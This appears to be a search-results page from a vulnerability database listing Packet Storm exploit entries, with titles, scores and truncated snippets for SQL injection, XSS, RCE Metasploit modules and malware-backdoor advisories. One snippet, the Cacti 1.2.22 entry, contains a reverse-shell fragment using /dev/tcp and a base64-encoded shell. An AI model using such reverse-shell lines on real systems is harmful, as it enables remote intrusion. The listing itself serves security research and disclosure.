Lucene search
K
PacketstormMost viewed

50784 matches found

Packet Storm
Packet Storm
added 2023/08/25 12:0 a.m.496 views

Business Directory Script 3.2 SQL Injection

Title: Business-Directory-Script-3.2 SQLi Author: nu11secur1ty Date: 08/25/2023 Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/business-directory-script/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The column parameter appears to...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/08/15 12:0 a.m.496 views

WordPress Core 5.6.2 XPath Injection

Exploit Title: WordPress Core 5.6.2 - Xpath Injection Date: 13/08/2023 Exploit Author: Behrouz Mansoori Vendor Homepage: https://wordpress.org Software Link: https://wordpress.org/download/releases Version: 5.6.2 Tested on: Mac VULNERABILITY DETAILS : This vulnerability allows remote attackers to...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2022/08/04 12:0 a.m.496 views

WordPress Duplicator 1.4.7 Unauthenticated Backup Download

Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download Author: nu11secur1ty Date: 08.03.2022 Vendor: https://wordpress.org/ Software: https://wordpress.org/plugins/duplicator/ Reference:...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2021/10/26 12:0 a.m.496 views

Sonicwall SonicOS 6.5.4 Cross Site Scripting

Document Title: =============== Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2272 Release Date: ============= 2021-10-18 Vulnerability Laboratory ID VL-ID:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/12/18 12:0 a.m.496 views

SyncBreeze 10.0.28 Denial Of Service

Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service Poc Data: 18-Dec-2020 Exploit Author: Ahmed Elkhressy Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7, Windows 10...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2018/11/15 12:0 a.m.496 views

2-Plan Team 1.0.4 Shell Upload

Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload Dork: N/A Date: 2018-11-15 Exploit Author: Ihsan Sencan Vendor Homepage: http://2-plan.com/ Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz Version: 1.0.4 Category: Webapps Tested on:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/08/08 12:0 a.m.495 views

Calibre 7.15.0 Python Code Injection

class MetasploitModule 'Calibre Python Code Injection CVE-2024-6782', 'Description' = %q This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled disabled by default, it will listen in its default configuration on all...

9.8CVSS7.1AI score0.83393EPSS
Exploits8
Packet Storm
Packet Storm
added 2023/09/21 12:0 a.m.495 views

TOTOLINK Wireless Routers Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.', 'Description' = %q Multiple TOTOLINK...

9.8CVSS7.1AI score0.25889EPSS
Exploits4
Packet Storm
Packet Storm
added 2022/11/30 12:0 a.m.495 views

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

CyberDanube Security Research 20221124-0 ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Hirschmann Belden BAT-C2 vulnerable version| 8.8.1.0R8 fixed version| 09.13.01.00R04 CVE number| CVE-2022-40282 impact| High...

8.9AI score0.03966EPSS
Exploits2
Packet Storm
Packet Storm
added 2021/01/05 12:0 a.m.495 views

Online Movie Streaming 1.0 SQL Injection

Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass Date: 2020-12-27 Exploit Author: Kshitiz Raj manitorpotterk Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html Software Link:...

0.7AI score
Exploits0
Packet Storm
Packet Storm
added 2020/10/14 12:0 a.m.495 views

NodeBB Forum 1.14.2 Account Takeover

Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover Date: 2020-08-18 Exploit Author: Muhammed Eren Uygun Vendor Homepage: https://nodebb.org/ Software Link: https://github.com/NodeBB/NodeBB Version: 1.12.2-1.14.2 Tested on: Linux CVE : CVE-2020-15149 -...

6.5CVSS9.7AI score0.02434EPSS
Exploits2
Packet Storm
Packet Storm
added 2020/09/22 12:0 a.m.495 views

Jenkins 2.56 CLI Deserialization / Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Jenkins CLI Deserialization', 'Description' = %q An unauthenticated Java object deserialization vulnerability exists in the CLI component for...

7.5CVSS0.4AI score0.99686EPSS
Exploits36
Packet Storm
Packet Storm
added 2019/05/03 12:0 a.m.495 views

SolarWinds DameWare Mini Remote Control 10.0 Denial Of Service

Vendor: Solarwinds Site Vendor: https://www.dameware.com/ Product: Dameware Mini Remote Control Version: 10.0 x64 Platform: Windows Tested on: Windows 7 SP1 x64 Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. The buffer size passed in on the machine name...

0.8AI score0.20587EPSS
Exploits5
Packet Storm
Packet Storm
added 2024/09/24 12:0 a.m.494 views

Traccar 5.12 Remote Code Execution

class MetasploitModule 'Traccar v5 Remote Code Execution CVE-2024-31214 and CVE-2024-24809', 'Description' = %q Remote Code Execution in Traccar v5.1 - v5.12. Remote code execution can be obtained by combining two vulnerabilities: A path traversal vulnerability CVE-2024-24809 and an unrestricted...

9.6CVSS7.1AI score0.54413EPSS
Exploits11
Packet Storm
Packet Storm
added 2023/07/19 12:0 a.m.494 views

Openfire Authentication Bypass / Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/zip' class MetasploitModule 'Openfire authentication bypass with RCE plugin', 'Description' = %q Openfire is an XMPP server licensed under the Open Source...

8.6CVSS7.1AI score0.99999EPSS
Exploits15
Packet Storm
Packet Storm
added 2021/11/05 12:0 a.m.494 views

Backdoor.Win32.Optix.03.b Code Execution

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/4cf1f1d740d7acea4d3836228980ebcb.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Optix.03.b Vulnerability: Unauthenticated Remote Command Execution Description: The...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2021/06/22 12:0 a.m.494 views

Solaris SunSSH 11.0 Remote Root

Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root 3 Exploit Author: Nathaniel Singer, Joe Rozner Date: 09/11/2020 CVE: 2020-14871 Vulnerable Versions: Oracle Solaris: 9 some releases, 10 all releases, 11.0 Description: CVE-2020-14871 is a critical pre-authentication via SSH stack-based...

10CVSS0.1AI score0.80291EPSS
Exploits13
Packet Storm
Packet Storm
added 2021/04/06 12:0 a.m.494 views

Pulse Secure VPN Arbitrary Command Execution

Exploit Title: Pulse Secure VPN - Arbitrary Command Execution Date: 05/04/2021 Exploit Author: Tobias Marcotto Tested on: Kali Linux x64 Version: 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX...

6.5CVSS0.4AI score0.98617EPSS
Exploits12
Packet Storm
Packet Storm
added 2020/07/20 12:0 a.m.494 views

Plexus anblick Digital Signage Management 3.1.13 Open Redirect

Plexus anblick Digital Signage Management 3.1.13 pagina param Open Redirect Vendor: Plexus Product web page: https://www.plexus.es https://www.plexus.es/wp-content/uploads/2020/06/PLEXUSANBLICK.pdf Affected version: 3.1.13 Summary: Advanced multiplatform digital signage solution. Reproduction of...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2019/08/28 12:0 a.m.494 views

Joomla Easy GuestBook 1.0 SQL Injection

Exploit Title : Joomla 1.0.15 Easy GuestBook ComEasyGB Components 1.0 SQL Injection Author Discovered By : KingSkrupellos Team : Cyberizm Digital Security Army Date : 29/08/2019 Vendor Homepage : joomlacode.org/gf/project/easygb/ - joomlart.com Joomla Affected Version : Joomla 1.0.12 - Joomla...

Exploits0
Packet Storm
Packet Storm
added 2025/02/25 12:0 a.m.493 views

Invoice Ninja 5.10.10 Insecure Deserialization / Remote Code Execution

Invoice Ninja versions 5.8.22 through 5.10.10 allows for remote code execution by leveraging a PHP deserialization vulnerability. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Invoice Ninja...

8.8CVSS8.1AI score0.065EPSS
Exploits5
Packet Storm
Packet Storm
added 2024/11/04 12:0 a.m.493 views

IBM Security Verify Access 32 Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory Information Title: 32 vulnerabilities in IBM Security Verify Access Advisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt Blog URL:...

10CVSS9.8AI score0.95764EPSS
Exploits13
Packet Storm
Packet Storm
added 2021/12/03 12:0 a.m.493 views

M-Files Web Denial Of Service

I. SUMMARY ============================================================================================================================================================= Title: M-Files Web Improper Range Header Processing Denial of Services DoS Vulnerability Product: M-Files Web version before...

7.6AI score0.02837EPSS
Exploits3
Packet Storm
Packet Storm
added 2021/10/28 12:0 a.m.493 views

HEUR.Backdoor.Win32.Generic Unauthenticated Open Proxy

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/6a96fc226fbe9f0efbcc8a7b2e34b807.txt Contact: [email protected] Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware liste...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2021/07/21 12:0 a.m.493 views

Online Shopping Portal 3.1 SQL Injection

Exploit Title: Online Shopping Portal - time-based blind SQL Injection Date: 2021-07-09 Exploit Author: faisalfs10x https://github.com/faisalfs10x Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/shopping-portal-free-download/ Version: 3.1 Tested on: Windows 10, XAMPP...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2020/11/15 12:0 a.m.493 views

KiteService 1.2020.1113.1 Unquoted Service Path

Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path Discovery by: IRVIN GIL Discovery Date: 2020-11-14 Vendor Homepage: https://www.kite.com/ Tested Version: 1.2020.1113.1 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 x64 es Step to discover...

0.5AI score
Exploits0
Packet Storm
Packet Storm
added 2024/04/05 12:0 a.m.492 views

Gibbon School Platform 26.0.00 Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability', 'Description' = %q A Remote Code Execution vulnerability in Gibbon onlin...

6.8AI score0.5132EPSS
Exploits7
Packet Storm
Packet Storm
added 2023/09/19 12:0 a.m.492 views

WordPress Essential Blocks 4.2.0 / Essential Blocks Pro 1.1.0 PHP Object Injection

Vulnerability Summary from Wordfence Intelligence Description: Insecure Deserialization/PHP Object Injection via queries Affected Plugin: Essential Blocks, Essential Blocks Pro Plugin slug: essential-blocks, essential-blocks-pro Vendor: WPDeveloper Affected versions: = 4.2.0 Free and = 1.1.0 Pro...

7.1AI score0.0134EPSS
Exploits3
Packet Storm
Packet Storm
added 2021/11/12 12:0 a.m.492 views

Aerohive NetConfig 10.0r8a Local File Inclusion / Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' = %q This module exploits LFI and log poisoning vulnerabilities...

9.2AI score0.35047EPSS
Exploits5
Packet Storm
Packet Storm
added 2023/03/31 12:0 a.m.491 views

Cacti 1.2.22 Remote Command Execution

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

9.8CVSS9.4AI score0.99826EPSS
Exploits48
Packet Storm
Packet Storm
added 2021/11/17 12:0 a.m.491 views

Quick.CMS 6.7 Cross Site Request Forgery / Cross Site Scripting

Exploit Title: Quick.CMS 6.7 - Cross-site request forgery CSRF to Cross-site Scripting XSS Authenticated Date: 2021-04-21 Exploit Author: Rahad Chowdhury Vendor Homepage: https://opensolution.org/ Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cmsv6.7-en.zip Version: 6.7...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2021/10/28 12:0 a.m.491 views

WordPress Supsystic Contact Form 1.7.18 Cross Site Scripting

Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting XSS Date: 10/27/2021 Exploit Author: Murat DEMIRCI @butterflyhunt3r Vendor Homepage: https://supsystic.com/ Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ Version: 1.7.18...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2021/02/22 12:0 a.m.491 views

Backdoor.Win32.Ketch.h Buffer Overflow

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/63c55ad21e0771c7f9ca71ec3bfcea0f.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ketch.h Vulnerability: Remote Stack Buffer Overflow SEH Description: Ketch makes HTTP...

0.6AI score
Exploits0
Packet Storm
Packet Storm
added 2020/12/27 12:0 a.m.491 views

URVE Software Build 24.03.2020 Information Disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-042 Product: URVE Software Manufacturer: Eveo Sp. z o.o. Affected Versions: Build "24.03.2020" Tested Versions: Build "24.03.2020" Vulnerability Type: Cleartext Storage of Sensitive Information CWE-312 Exposure of Sensitive...

5CVSS7.7AI score0.01421EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/01/08 12:0 a.m.490 views

Linux 6.4 io_uring Use-After-Free

Linux =6.4: iouring: page UAF via buffer ring mmap Since commit c56e022c0a27 "iouring: add support for user mapped provided buffer ring", landed in Linux 6.4, iouring makes it possible to allocate, mmap, and deallocate "buffer rings". A "buffer ring" can be allocated with iouringregister...,...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2021/06/24 12:0 a.m.490 views

VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution

Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution RCE Unauthenticated Date: 06/21/2021 Exploit Author: CHackA0101 Vendor Homepage: https://kb.vmware.com/s/article/82374 Software Link: https://www.vmware.com/products/vcenter-server.html Version: This affects VMware...

10CVSS0.4AI score0.9957EPSS
Exploits47
Packet Storm
Packet Storm
added 2020/08/28 12:0 a.m.490 views

WordPress Autoptimize 2.7.6 Shell Upload

Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload Authenticated Date: 2020-08-24 Software Link: https://wordpress.org/plugins/autoptimize/ Author : SunCSR Team Version: v2.7.6 Tested on Ubuntu 18.04 / Kali Linux Reference: https://wpvulndb.com/vulnerabilities/10372...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2020/04/27 12:0 a.m.490 views

Docker-Credential-Wincred.exe Privilege Escalation

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Docker-Credential-Wincred.exe Privilege Escalation', 'Description' = %q This exploit leverages a vulnerability in docker desktop community editio...

9.3CVSS0.6AI score0.29628EPSS
Exploits5
Packet Storm
Packet Storm
added 2018/11/16 12:0 a.m.490 views

Helpdezk 1.1.1 Shell Upload

Exploit Title: Helpdezk 1.1.1 - Arbitrary File Upload Dork: N/A Date: 2018-11-13 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.helpdezk.org/ Software Link: https://netcologne.dl.sourceforge.net/project/helpdezk/helpdezk-1.1.1.zip Version: 1.1.1 Category: Webapps Tested on:...

Exploits0
Packet Storm
Packet Storm
added 2024/11/04 12:0 a.m.489 views

ESET NOD32 Antivirus 18.0.12.0 Unquoted Service Path

Exploit Title: ESET NOD32 Antivirus 18.0.12.0 - "ESET Service" Unquoted Service Path Exploit Author: Milad Karimi Ex3ptionaL Exploit Date: 2024-11-02 Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL MiRROR-H: https://mirror-h.org/search/hacker/49626/ Vendor :...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/04/02 12:0 a.m.489 views

Computer Laboratory Management System 1.0 Insecure Direct Object Reference

Vulnerability Details: Application Name: Computer Laboratory Management System Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html Vendor Homepage: https://www.sourcecodester.com/users/tips23 BuG: Insecure Direct Object References...

5.5CVSS7.2AI score0.00487EPSS
Exploits2
Packet Storm
Packet Storm
added 2021/10/29 12:0 a.m.489 views

Umbraco 8.14.1 Server-Side Request Forgery

Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF Date: July 5, 2021 Exploit Author: NgoAnhDuc Vendor Homepage: https://our.umbraco.com/ Software Link: https://our.umbraco.com/download/releases/8141 Version: v8.14.1 Affect: Umbraco CMS v8.14.1, Umbraco Cloud Vulnerable code:...

0.7AI score
Exploits0
Packet Storm
Packet Storm
added 2021/05/03 12:0 a.m.489 views

Google Chrome XOR Typer Out-Of-Bounds Access / Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE', 'Description' = %q This module exploits an issue in the V8...

6.8CVSS0.6AI score0.70435EPSS
Exploits6
Packet Storm
Packet Storm
added 2026/04/13 12:0 a.m.488 views

📄 OpenSTAManager 2.9.8 SQL Injection

OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in ajaxselect.php. CVE-2025-69214: OpenSTAManager has a SQL Injection in ajaxselect.php componenti endpoint Overview | Field | Details | |---|---| | CVE ID | CVE-2025-69214 | | Severity | HIGH | | Advisory |...

8.8CVSS5.9AI score0.00423EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/09/18 12:0 a.m.488 views

Razer Synapse Race Condition / DLL Hijacking

Advisory ID: SYSS-2023-002 Product: Razer Synapse Manufacturer: Razer Inc. Affected Versions: Versions before 3.8.0428.042117 20230601 Tested Versions: 3.8.0228.022313 20230315 under Windows 10 Pro 10.0.19044 under Windows 11 Home 10.0.22621 Vulnerability Type: Improper Privilege Management CWE-2...

7.8CVSS7.1AI score0.00889EPSS
Exploits7
Packet Storm
Packet Storm
added 2023/04/06 12:0 a.m.488 views

PostgreSQL 9.6.1 Remote Code Execution

Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution RCE Authenticated Date: 2023-02-01 Exploit Author: Paulo Trindade @paulotrindadec, Bruno Stabelini @Bruno Stabelini, Diego Farias @fulcrum and Weslley Shaimon Github: https://github.com/paulotrindadec/CVE-2019-9193 Version: PostgreSQL 9.6.1 ...

9CVSS7AI score0.91877EPSS
Exploits17
Packet Storm
Packet Storm
added 2021/10/29 12:0 a.m.488 views

Mini-XML 3.2 Heap Overflow

Exploit Title: Mini-XML 3.2 - Heap Overflow Google Dork: mxml Mini-xml Mini-XML Date: 2020.10.19 Exploit Author: LIWEI Vendor Homepage: https://www.msweet.org/mxml/ Software Link: https://github.com/michaelrsweet/mxml Version: v3.2 Tested on: ubuntu 18.04.2 1.- compile the Mini-XML code to a...

0.4AI score
Exploits0
Packet Storm
Packet Storm
added 2021/10/28 12:0 a.m.488 views

Backdoor.Win32.Prorat.ntz Man-In-The-Middle

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/ab96d7f9e008a0774239be6be0c8e7bb.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Prorat.ntz Vulnerability: Port Bounce Scan Description: The malware runs an FTP serve...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/09/07 12:0 a.m.488 views

Grocy 2.7.1 Cross Site Scripting

Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting Date: 2020-09-06 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://berrnd.de/ Software Link: https://github.com/grocy/grocy Version: 2.7.1 Tested on: Kali Linux 2020.3 Proof Of Concept: grocy household management solution...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2025/04/17 12:0 a.m.487 views

📄 Meshtastic Buffer Overflow

A fault in the handling of mesh packets containing invalid protobuf data can result in an attacker-controlled buffer overflow, allowing an attacker to hijack execution flow, potentially resulting in remote code execution. This attack does not require authentication or user interaction, as long as...

9.4CVSS8.3AI score0.00829EPSS
Exploits2
Total number of security vulnerabilities5000